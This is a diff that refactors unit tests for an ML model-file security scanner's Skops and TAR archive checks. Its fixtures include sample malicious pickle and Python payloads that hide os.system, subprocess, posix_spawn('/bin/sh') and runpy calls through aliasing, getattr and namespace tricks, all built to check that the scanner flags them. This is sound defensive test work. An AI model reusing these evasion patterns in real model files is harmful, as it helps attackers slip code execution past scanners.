tmp_pat zf.writestr("schema.json", '{"version": "1.0"}') scanner = SkopsScanner() - result = scanner.scan(str(skops_file)) - - cve_checks = [c for c in result.checks if "CVE-2025-54413" in c.name] - assert not [c for c in cve_checks if c.status == CheckStatus.FAILED] + assert_skops_cve_clean(scanner, skops_file, "CVE-2025-54413") def test_valid_methodnode_loader_is_not_flagged(self, tmp_path: Path) -> None: """Legitimate bound-method nodes keep their wrapped object type aligned.""" @@ -245,10 +217,7 @@ def test_valid_methodnode_loader_is_not_flagged(self, tmp_path: Path) -> None: ), ) - result = SkopsScanner().scan(str(skops_file)) - - cve_checks = [c for c in result.checks if "CVE-2025-54413" in c.name] - assert not [c for c in cve_checks if c.status == CheckStatus.FAILED] + assert_skops_cve_clean(SkopsScanner(), skops_file, "CVE-2025-54413") class TestSkopsScannerCVE2025_54886: @@ -319,33 +288,11 @@ class TestSkopsScannerJoblibFallback: def test_detects_joblib_load_pattern(self, tmp_path: Path) -> None: """Test detection of joblib.load patterns in file content.""" - skops_file = tmp_path / "malicious.skops" - with zipfile.ZipFile(skops_file, "w") as zf: - zf.writestr("model.pkl", b"joblib.load(model_path)") - zf.writestr("schema.json", '{"version": "1.0"}') - - scanner = SkopsScanner() - result = scanner.scan(str(skops_file)) - - joblib_checks = [c for c in result.checks if "Joblib" in c.name] - assert len(joblib_checks) > 0 - assert joblib_checks[0].status == CheckStatus.FAILED - assert joblib_checks[0].severity == IssueSeverity.WARNING + _assert_skops_unsafe_load_pattern(tmp_path, ("model.pkl"), (b"joblib.load(model_path)")) def test_detects_pickle_load_pattern(self, tmp_path: Path) -> None: """Test detection of pickle.load patterns.""" - skops_file = tmp_path / "malicious.skops" - with zipfile.ZipFile(skops_file, "w") as zf: - zf.writestr("loader.py", b"import pickle\npickle.load(f)") - zf.writestr("schema.json", '{"version": "1.0"}') - - scanner = SkopsScanner() - result = scanner.scan(str(skops_file)) - - joblib_checks = [c for c in result.checks if "Joblib" in c.name] - assert len(joblib_checks) > 0 - assert joblib_checks[0].status == CheckStatus.FAILED - assert joblib_checks[0].severity == IssueSeverity.WARNING + _assert_skops_unsafe_load_pattern(tmp_path, ("loader.py"), (b"import pickle\npickle.load(f)")) def test_no_false_positive_sklearn_in_schema_json(self, tmp_path: Path) -> None: """Regression: schema.json with sklearn type refs must NOT trigger joblib fallback. @@ -632,19 +579,12 @@ def test_unreadable_numpy_payload_marks_skops_incomplete( original_open = zipfile.ZipFile.open - def open_with_failure( - archive: zipfile.ZipFile, - name: str | zipfile.ZipInfo, - mode: Literal["r", "w"] = "r", - pwd: bytes | None = None, - *, - force_zip64: bool = False, - ) -> Any: - if isinstance(name, zipfile.ZipInfo) and name.filename == "step/0/content/0.npy": - raise zipfile.BadZipFile("CRC mismatch") - return original_open(archive, name, mode, pwd, force_zip64=force_zip64) - - monkeypatch.setattr(zipfile.ZipFile, "open", open_with_failure) + install_zip_open_failure( + monkeypatch, + original_open, + lambda name: isinstance(name, zipfile.ZipInfo) and name.filename == "step/0/content/0.npy", + lambda: zipfile.BadZipFile("CRC mismatch"), + ) result = scan_model_directory_or_file(str(skops_file), cache_enabled=False) @@ -775,20 +715,12 @@ def test_unreadable_entry_core_exits_two_and_avoids_cache_reuse( original_open = zipfile.ZipFile.open - def open_with_failure( - archive: zipfile.ZipFile, - name: str | zipfile.ZipInfo, - mode: Literal["r", "w"] = "r", - pwd: bytes | None = None, - *, - force_zip64: bool = False, - ) -> Any: - filename = name.filename if isinstance(name, zipfile.ZipInfo) else name - if filename == "README.md": - raise exception_type(message) - return original_open(archive, name, mode, pwd, force_zip64=force_zip64) - - monkeypatch.setattr(zipfile.ZipFile, "open", open_with_failure) + install_zip_open_failure( + monkeypatch, + original_open, + lambda name: (name.filename if isinstance(name, zipfile.ZipInfo) else name) == "README.md", + lambda: exception_type(message), + ) cache_dir = tmp_path / f"unreadable-cache-{exception_type.__name__}" reset_cache_manager() @@ -823,20 +755,12 @@ def test_unreadable_executable_member_name_remains_a_security_finding( original_open = zipfile.ZipFile.open - def open_with_failure( - archive: zipfile.ZipFile, - name: str | zipfile.ZipInfo, - mode: Literal["r", "w"] = "r", - pwd: bytes | None = None, - *, - force_zip64: bool = False, - ) -> Any: - filename = name.filename if isinstance(name, zipfile.ZipInfo) else name - if filename == "bin/run.sh": - raise zipfile.BadZipFile("CRC mismatch") - return original_open(archive, name, mode, pwd, force_zip64=force_zip64) - - monkeypatch.setattr(zipfile.ZipFile, "open", open_with_failure) + install_zip_open_failure( + monkeypatch, + original_open, + lambda name: (name.filename if isinstance(name, zipfile.ZipInfo) else name) == "bin/run.sh", + lambda: zipfile.BadZipFile("CRC mismatch"), + ) result = scan_model_directory_or_file(str(skops_file), cache_enabled=False) @@ -864,19 +788,12 @@ def test_unreadable_member_alias_does_not_suppress_readable_pickle_finding( original_open = zipfile.ZipFile.open - def open_with_failure( - archive: zipfile.ZipFile, - name: str | zipfile.ZipInfo, - mode: Literal["r", "w"] = "r", - pwd: bytes | None = None, - *, - force_zip64: bool = False, - ) -> Any: - if isinstance(name, zipfile.ZipInfo) and name.filename == "./payload.pkl": - raise zipfile.BadZipFile("CRC mismatch") - return original_open(archive, name, mode, pwd, force_zip64=force_zip64) - - monkeypatch.setattr(zipfile.ZipFile, "open", open_with_failure) + install_zip_open_failure( + monkeypatch, + original_open, + lambda name: isinstance(name, zipfile.ZipInfo) and name.filename == "./payload.pkl", + lambda: zipfile.BadZipFile("CRC mismatch"), + ) result = scan_model_directory_or_file(str(skops_file), cache_enabled=False) @@ -906,20 +823,12 @@ def test_unreadable_symlink_member_remains_inconclusive( original_open = zipfile.ZipFile.open - def open_with_failure( - archive: zipfile.ZipFile, - name: str | zipfile.ZipInfo, - mode: Literal["r", "w"] = "r", - pwd: bytes | None = None, - *, - force_zip64: bool = False, - ) -> Any: - filename = name.filename if isinstance(name, zipfile.ZipInfo) else name - if filename == "weights_link": - raise zipfile.BadZipFile("CRC mismatch") - return original_open(archive, name, mode, pwd, force_zip64=force_zip64) - - monkeypatch.setattr(zipfile.ZipFile, "open", open_with_failure) + install_zip_open_failure( + monkeypatch, + original_open, + lambda name: (name.filename if isinstance(name, zipfile.ZipInfo) else name) == "weights_link", + lambda: zipfile.BadZipFile("CRC mismatch"), + ) result = scan_model_directory_or_file(str(skops_file), cache_enabled=False) @@ -948,19 +857,12 @@ def test_unreadable_symlink_alias_does_not_suppress_readable_escape_finding( original_open = zipfile.ZipFile.open - def open_with_failure( - archive: zipfile.ZipFile, - name: str | zipfile.ZipInfo, - mode: Literal["r", "w"] = "r", - pwd: bytes | None = None, - *, - force_zip64: bool = False, - ) -> Any: - if isinstance(name, zipfile.ZipInfo) and name.filename == "./weights_link": - raise zipfile.BadZipFile("CRC mismatch") - return original_open(archive, name, mode, pwd, force_zip64=force_zip64) - - monkeypatch.setattr(zipfile.ZipFile, "open", open_with_failure) + install_zip_open_failure( + monkeypatch, + original_open, + lambda name: isinstance(name, zipfile.ZipInfo) and name.filename == "./weights_link", + lambda: zipfile.BadZipFile("CRC mismatch"), + ) result = scan_model_directory_or_file(str(skops_file), cache_enabled=False) @@ -1066,49 +968,20 @@ def test_archive_uncompressed_size_limit_core_exits_two_and_avoids_cache_reuse(s def test_not_zip_core_exits_one_and_avoids_cache_reuse(self, tmp_path: Path) -> None: """A non-ZIP .skops path is incomplete Skops coverage, not a cacheable clean result.""" - skops_file = tmp_path / "not_zip.skops" - skops_file.write_bytes(b"not a zip archive") - - cache_dir = tmp_path / "cache" - reset_cache_manager() - try: - first, second = _scan_twice_with_cache(skops_file, cache_dir) - - for result in (first, second): - assert result.success is False - assert determine_exit_code(result) == 1 - metadata = result.file_metadata[str(skops_file)] - _assert_inconclusive_reason(metadata, "skops_not_zip_archive") - assert any("not a ZIP archive" in str(issue.message) for issue in result.issues) - - stats = get_cache_manager(str(cache_dir), enabled=True).get_stats() - assert stats["cache_hits"] == 0 - assert stats["total_entries"] == 0 - finally: - reset_cache_manager() + _assert_skops_core_error_without_cache( + tmp_path, ("not_zip.skops"), (b"not a zip archive"), (1), ("skops_not_zip_archive"), ("not a ZIP archive") + ) def test_bad_zip_core_exits_two_and_avoids_cache_reuse(self, tmp_path: Path) -> None: """A corrupt ZIP-like .skops path should also fail closed and stay uncached.""" - skops_file = tmp_path / "bad_zip.skops" - skops_file.write_bytes(b"PK\x03\x04not a complete zip") - - cache_dir = tmp_path / "cache" - reset_cache_manager() - try: - first, second = _scan_twice_with_cache(skops_file, cache_dir) - - for result in (first, second): - assert result.success is False - assert determine_exit_code(result) == 2 - metadata = result.file_metadata[str(skops_file)] - _assert_inconclusive_reason(metadata, "skops_bad_zip_file") - assert any("Invalid ZIP file" in str(issue.message) for issue in result.issues) - - stats = get_cache_manager(str(cache_dir), enabled=True).get_stats() - assert stats["cache_hits"] == 0 - assert stats["total_entries"] == 0 - finally: - reset_cache_manager() + _assert_skops_core_error_without_cache( + tmp_path, + ("bad_zip.skops"), + (b"PK\x03\x04not a complete zip"), + (2), + ("skops_bad_zip_file"), + ("Invalid ZIP file"), + ) def test_unexpected_scan_failure_core_exits_two_and_avoids_cache_reuse( self, @@ -1162,35 +1035,9 @@ def test_recursive_member_scan_reuses_preflighted_archive_after_path_replacement archive.writestr("schema.json", '{"version": "1.0"}') archive.writestr("payload.pkl", b'cos\nsystem\n(S"echo replacement"\ntR.') - original_scan_archive_members = zip_scanner_module.ZipScanner.scan_archive_members - original_open = builtins.open - path_reopened = False - - def redirect_path_open(file: Any, *args: Any, **kwargs: Any) -> Any: - nonlocal path_reopened - if str(file) == str(skops_path): - path_reopened = True - file = replacement_path - return original_open(file, *args, **kwargs) - - def replace_then_scan( - scanner: zip_scanner_module.ZipScanner, - path: str, - archive: zipfile.ZipFile | None = None, - ) -> ScanResult: - assert archive is not None - with monkeypatch.context() as path_swap: - path_swap.setattr(builtins, "open", redirect_path_open) - return original_scan_archive_members(scanner, path, archive=archive) - - monkeypatch.setattr(zip_scanner_module.ZipScanner, "scan_archive_members", replace_then_scan) - - result = SkopsScanner().scan(str(skops_path)) - - assert path_reopened is False - assert not any(issue.details.get("zip_entry") == "payload.pkl" for issue in result.issues) - assert any(entry.get("path", "").endswith(":safe.txt") for entry in result.metadata["contents"]) - assert not any(entry.get("path", "").endswith(":payload.pkl") for entry in result.metadata["contents"]) + assert_preflighted_archive_survives_replacement( + monkeypatch, skops_path, replacement_path, SkopsScanner, zip_scanner_module.ZipScanner + ) def test_oversized_numpy_payload_core_exits_zero_and_still_caches(self, tmp_path: Path) -> None: """Oversized numeric arrays should not become Skops CVE false positives in aggregate scans.""" @@ -1374,3 +1221,61 @@ def test_scan_real_skops_model_metadata(self) -> None: assert result.metadata.get("file_size", 0) > 0 assert result.metadata.get("file_count", 0) > 0 + + +def _assert_skops_core_error_without_cache( + tmp_path: Path, filename: str, payload: bytes, exit_code: int, reason: str, message: str +) -> None: + skops_file = tmp_path / filename + skops_file.write_bytes(payload) + + cache_dir = tmp_path / "cache" + reset_cache_manager() + try: + first, second = _scan_twice_with_cache(skops_file, cache_dir) + + for result in (first, second): + assert result.success is False + assert determine_exit_code(result) == exit_code + metadata = result.file_metadata[str(skops_file)] + _assert_inconclusive_reason(metadata, reason) + assert any(message in str(issue.message) for issue in result.issues) + + stats = get_cache_manager(str(cache_dir), enabled=True).get_stats() + assert stats["cache_hits"] == 0 + assert stats["total_entries"] == 0 + finally: + reset_cache_manager() + + +def _assert_skops_malicious_loader_node(tmp_path: Path, schema: str, check_name: str) -> None: + skops_file = tmp_path / "malicious.skops" + with zipfile.ZipFile(skops_file, "w") as zf: + zf.writestr( + "schema.json", + schema, + ) + + scanner = SkopsScanner() + result = scanner.scan(str(skops_file)) + + assert result.success is False + cve_checks = [c for c in result.checks if check_name in c.name] + assert len(cve_checks) > 0 + assert cve_checks[0].status == CheckStatus.FAILED + assert cve_checks[0].severity == IssueSeverity.CRITICAL + + +def _assert_skops_unsafe_load_pattern(tmp_path: Path, member_name: str, payload: bytes) -> None: + skops_file = tmp_path / "malicious.skops" + with zipfile.ZipFile(skops_file, "w") as zf: + zf.writestr(member_name, payload) + zf.writestr("schema.json", '{"version": "1.0"}') + + scanner = SkopsScanner() + result = scanner.scan(str(skops_file)) + + joblib_checks = [c for c in result.checks if "Joblib" in c.name] + assert len(joblib_checks) > 0 + assert joblib_checks[0].status == CheckStatus.FAILED + assert joblib_checks[0].severity == IssueSeverity.WARNING diff --git a/tests/scanners/test_tar_scanner.py b/tests/scanners/test_tar_scanner.py index 67c649ca1..b108fc853 100644 --- a/tests/scanners/test_tar_scanner.py +++ b/tests/scanners/test_tar_scanner.py @@ -7,7 +7,7 @@ import tarfile import tempfile import zipfile -from collections.abc import Iterator +from collections.abc import Callable, Iterator from contextlib import contextmanager from pathlib import Path from typing import Any, BinaryIO, Literal, cast @@ -35,6 +35,9 @@ TarScanner, ) from modelaudit.utils.file import detection as file_detection +from tests.helpers.file_creators import SystemCommandPayload +from tests.helpers.scanners import scan_nested_critical_finding as nested_scan +from tests.helpers.scanners import scan_nested_unsuccessful def _tar_octal_field(value: int, width: int) -> bytes: @@ -215,6 +218,14 @@ def _assert_inconclusive_aggregate_not_reused( class TestTarScanner: """Test the TAR scanner""" + def _scan_python_tar_member(self, archive_path: Path, payload: bytes | bytearray, member_name: str) -> ScanResult: + with tarfile.open(archive_path, "w") as archive: + info = tarfile.TarInfo(member_name) + info.size = len(payload) + archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] + result = self.scanner.scan(str(archive_path)) + return result + def setup_method(self): """Set up test fixtures""" self.scanner = TarScanner() @@ -302,12 +313,7 @@ def test_scan_tar_flags_dangerous_python_member(self, tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.tar" payload = b"import os\nos.system('echo hidden')\n" - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "handler.py") python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] assert len(python_checks) == 1 @@ -316,121 +322,86 @@ def test_scan_tar_flags_dangerous_python_member(self, tmp_path: Path) -> None: assert python_checks[0].details["entry"] == "handler.py" assert result.success is True - def test_scan_tar_flags_aliased_dangerous_python_member(self, tmp_path: Path) -> None: - """Aliased high-risk calls should not bypass generic TAR Python member scanning.""" + def _assert_tar_aliased_call(self, tmp_path: Path, source_bytes: bytes, reason: str) -> None: archive_path = tmp_path / "model_bundle.tar" - payload = b"from os import system as run_command\nrun_command('echo hidden')\n" - - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] + payload = source_bytes - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "handler.py") python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] assert len(python_checks) == 1 assert python_checks[0].status == CheckStatus.FAILED assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].details["reason"] == "high-risk calls: os.system" + assert python_checks[0].details["reason"] == reason + + def test_scan_tar_flags_aliased_dangerous_python_member(self, tmp_path: Path) -> None: + """Aliased high-risk calls should not bypass generic TAR Python member scanning.""" + self._assert_tar_aliased_call( + tmp_path, + (b"from os import system as run_command\nrun_command('echo hidden')\n"), + ("high-risk calls: os.system"), + ) def test_scan_tar_flags_wildcard_import_dangerous_python_member(self, tmp_path: Path) -> None: """Wildcard imports should resolve known high-risk call names.""" - archive_path = tmp_path / "model_bundle.tar" - payload = b"from subprocess import *\nrun(['echo', 'hidden'], check=False)\n" + self._assert_tar_aliased_call( + tmp_path, + (b"from subprocess import *\nrun(['echo', 'hidden'], check=False)\n"), + ("high-risk calls: subprocess.run"), + ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] + def _assert_tar_member_rule(self, tmp_path: Path, source_bytes: bytes, rule_code: str, reason: str) -> None: + archive_path = tmp_path / "model_bundle.tar" + payload = source_bytes - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "handler.py") python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] assert len(python_checks) == 1 assert python_checks[0].status == CheckStatus.FAILED assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + assert python_checks[0].rule_code == rule_code + assert python_checks[0].details["reason"] == reason def test_scan_tar_flags_builtins_getattr_call_dangerous_python_member(self, tmp_path: Path) -> None: """getattr indirection should still resolve to the risky call name.""" - archive_path = tmp_path / "model_bundle.tar" - payload = b"import builtins as bi\nimport os\nbi.getattr(os, 'system').__call__('echo hidden')\n" - - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].rule_code == "S101" - assert python_checks[0].details["reason"] == "high-risk calls: os.system" + self._assert_tar_member_rule( + tmp_path, + (b"import builtins as bi\nimport os\nbi.getattr(os, 'system').__call__('echo hidden')\n"), + ("S101"), + ("high-risk calls: os.system"), + ) def test_scan_tar_flags_aliased_getattr_helper_dangerous_python_member(self, tmp_path: Path) -> None: """Aliased getattr helpers and module aliases should still resolve risky calls.""" - archive_path = tmp_path / "model_bundle.tar" - payload = ( - b"from builtins import getattr as resolve\n" - b"import os as operating_system\n" - b"resolve(operating_system, 'system')('echo hidden')\n" + self._assert_tar_member_rule( + tmp_path, + ( + b"from builtins import getattr as resolve\n" + b"import os as operating_system\n" + b"resolve(operating_system, 'system')('echo hidden')\n" + ), + ("S101"), + ("high-risk calls: os.system"), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].rule_code == "S101" - assert python_checks[0].details["reason"] == "high-risk calls: os.system" - def test_scan_tar_flags_concatenated_getattr_name_dangerous_python_member(self, tmp_path: Path) -> None: """Static string concatenation should not hide risky getattr targets.""" - archive_path = tmp_path / "model_bundle.tar" - payload = b"import os\ngetattr(os, 'sys' + 'tem')('echo hidden')\n" - - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].rule_code == "S101" - assert python_checks[0].details["reason"] == "high-risk calls: os.system" + self._assert_tar_member_rule( + tmp_path, + (b"import os\ngetattr(os, 'sys' + 'tem')('echo hidden')\n"), + ("S101"), + ("high-risk calls: os.system"), + ) def test_scan_tar_flags_namespace_mapping_dangerous_python_member(self, tmp_path: Path) -> None: """Module namespace dictionary lookup must not hide a risky call.""" - archive_path = tmp_path / "model_bundle.tar" - payload = b"import subprocess as sp\nvars(sp)['r' + 'un'](['echo', 'hidden'], check=False)\n" - - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].rule_code == "S103" - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + self._assert_tar_member_rule( + tmp_path, + (b"import subprocess as sp\nvars(sp)['r' + 'un'](['echo', 'hidden'], check=False)\n"), + ("S103"), + ("high-risk calls: subprocess.run"), + ) @pytest.mark.parametrize( "payload", @@ -468,12 +439,7 @@ def test_scan_tar_flags_static_namespace_indirection_dangerous_python_member( """Static namespace indirection should retain high-risk callable identity.""" archive_path = tmp_path / "model_bundle.tar" - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "handler.py") python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] assert len(python_checks) == 1 @@ -481,28 +447,45 @@ def test_scan_tar_flags_static_namespace_indirection_dangerous_python_member( assert python_checks[0].rule_code == "S101" assert python_checks[0].details["reason"] == "high-risk calls: os.system" + def _assert_tar_namespaced_call( + self, tmp_path: Path, source_bytes: bytes, member_name: str, rule_code: str, reason: str + ) -> None: + archive_path = tmp_path / "model_bundle.tar" + payload = source_bytes + + result = self._scan_python_tar_member(archive_path, payload, member_name) + + python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] + assert len(python_checks) == 1 + assert python_checks[0].status == CheckStatus.FAILED + assert python_checks[0].rule_code == rule_code + assert python_checks[0].details["reason"] == reason + def test_scan_tar_flags_namespace_bound_os_process_launch(self, tmp_path: Path) -> None: """Namespace-write tracking must also preserve newly modeled OS launch APIs.""" - archive_path = tmp_path / "model_bundle.tar" - payload = ( - b"import os\n" - b"namespace = os.__dict__\n" - b"namespace['launch'] = os.posix_spawn\n" - b"namespace['launch']('/bin/sh', ['sh'], {})\n" + self._assert_tar_namespaced_call( + tmp_path, + ( + b"import os\n" + b"namespace = os.__dict__\n" + b"namespace['launch'] = os.posix_spawn\n" + b"namespace['launch']('/bin/sh', ['sh'], {})\n" + ), + ("handler.py"), + ("S101"), + ("high-risk calls: os.posix_spawn"), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] + def _assert_tar_python_primitive(self, tmp_path: Path, payload: bytes, dangerous_name: str, rule_code: str) -> None: + archive_path = tmp_path / "model_bundle.tar" - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "handler.py") python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] assert len(python_checks) == 1 assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].rule_code == "S101" - assert python_checks[0].details["reason"] == "high-risk calls: os.posix_spawn" + assert python_checks[0].rule_code == rule_code + assert python_checks[0].details["reason"] == f"high-risk calls: {dangerous_name}" @pytest.mark.parametrize( ("payload", "dangerous_name"), @@ -528,20 +511,7 @@ def test_scan_tar_flags_namespace_bound_os_process_launch(self, tmp_path: Path) def test_scan_tar_flags_asyncio_subprocess_python_member( self, tmp_path: Path, payload: bytes, dangerous_name: str ) -> None: - archive_path = tmp_path / "model_bundle.tar" - - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].rule_code == "S103" - assert python_checks[0].details["reason"] == f"high-risk calls: {dangerous_name}" + self._assert_tar_python_primitive(tmp_path, payload, dangerous_name, ("S103")) @pytest.mark.parametrize( ("payload", "dangerous_name"), @@ -554,145 +524,82 @@ def test_scan_tar_flags_asyncio_subprocess_python_member( def test_scan_tar_flags_runpy_execution_python_member( self, tmp_path: Path, payload: bytes, dangerous_name: str ) -> None: - archive_path = tmp_path / "model_bundle.tar" - - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == f"high-risk calls: {dangerous_name}" + self._assert_tar_python_primitive(tmp_path, payload, dangerous_name, ("S108")) def test_scan_tar_flags_extensionless_runpy_python_member(self, tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.tar" - payload = b"import runpy\nrunpy.run_module('payload')\n" - - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == "high-risk calls: runpy.run_module" + self._assert_tar_namespaced_call( + tmp_path, + (b"import runpy\nrunpy.run_module('payload')\n"), + ("handler"), + ("S108"), + ("high-risk calls: runpy.run_module"), + ) def test_scan_tar_ignores_extensionless_runpy_near_match(self, tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.tar" payload = b"documentation mentions runpy.run_module('payload')\n" - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("notes") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "notes") assert result.success is True assert not any(check.name == "Python Archive Member Security" for check in result.checks) - def test_scan_tar_allows_replaced_runpy_execution(self, tmp_path: Path) -> None: + def _assert_tar_python_without_finding(self, tmp_path: Path, source_bytes: bytes) -> None: archive_path = tmp_path / "model_bundle.tar" - payload = b"import runpy\nrunpy.run_path = len\nrunpy.run_path([])\n" + payload = source_bytes - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "handler.py") assert not any(check.name == "Python Archive Member Security" for check in result.checks) - def test_scan_tar_ignores_runpy_member_after_module_alias_rebind(self, tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.tar" - payload = b"class Safe:\n run_path = len\nimport runpy as rp\nrp = Safe()\nrp.run_path([])\n" - - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + def test_scan_tar_allows_replaced_runpy_execution(self, tmp_path: Path) -> None: + self._assert_tar_python_without_finding(tmp_path, (b"import runpy\nrunpy.run_path = len\nrunpy.run_path([])\n")) - assert not any(check.name == "Python Archive Member Security" for check in result.checks) + def test_scan_tar_ignores_runpy_member_after_module_alias_rebind(self, tmp_path: Path) -> None: + self._assert_tar_python_without_finding( + tmp_path, (b"class Safe:\n run_path = len\nimport runpy as rp\nrp = Safe()\nrp.run_path([])\n") + ) def test_scan_tar_ignores_safe_namespace_slot_rebinding(self, tmp_path: Path) -> None: """A safe final callable bound through a module dictionary should remain clean.""" - archive_path = tmp_path / "model_bundle.tar" - payload = ( - b"import os\nnamespace = os.__dict__\nnamespace['runner'] = os.system\n" - b"namespace['runner'] = print\nnamespace['runner']('safe')\n" + self._assert_tar_python_without_finding( + tmp_path, + ( + b"import os\nnamespace = os.__dict__\nnamespace['runner'] = os.system\n" + b"namespace['runner'] = print\nnamespace['runner']('safe')\n" + ), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - assert not any(check.name == "Python Archive Member Security" for check in result.checks) - def test_scan_tar_ignores_overwritten_module_namespace_import(self, tmp_path: Path) -> None: """A known module mapping overwrite should not retain a stale dangerous import.""" - archive_path = tmp_path / "model_bundle.tar" - payload = ( - b"import os\nclass Safe:\n system = print\nnamespace = globals()\n" - b"namespace['os'] = Safe\nnamespace['os'].system('safe')\n" + self._assert_tar_python_without_finding( + tmp_path, + ( + b"import os\nclass Safe:\n system = print\nnamespace = globals()\n" + b"namespace['os'] = Safe\nnamespace['os'].system('safe')\n" + ), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - assert not any(check.name == "Python Archive Member Security" for check in result.checks) - def test_scan_tar_ignores_class_body_module_namespace_overwrite(self, tmp_path: Path) -> None: """A class-body globals write is an executed module namespace overwrite.""" - archive_path = tmp_path / "model_bundle.tar" - payload = ( - b"import os\nclass Safe:\n system = print\nclass Replace:\n" - b" globals()['os'] = Safe\nos.system('safe')\n" + self._assert_tar_python_without_finding( + tmp_path, + ( + b"import os\nclass Safe:\n system = print\nclass 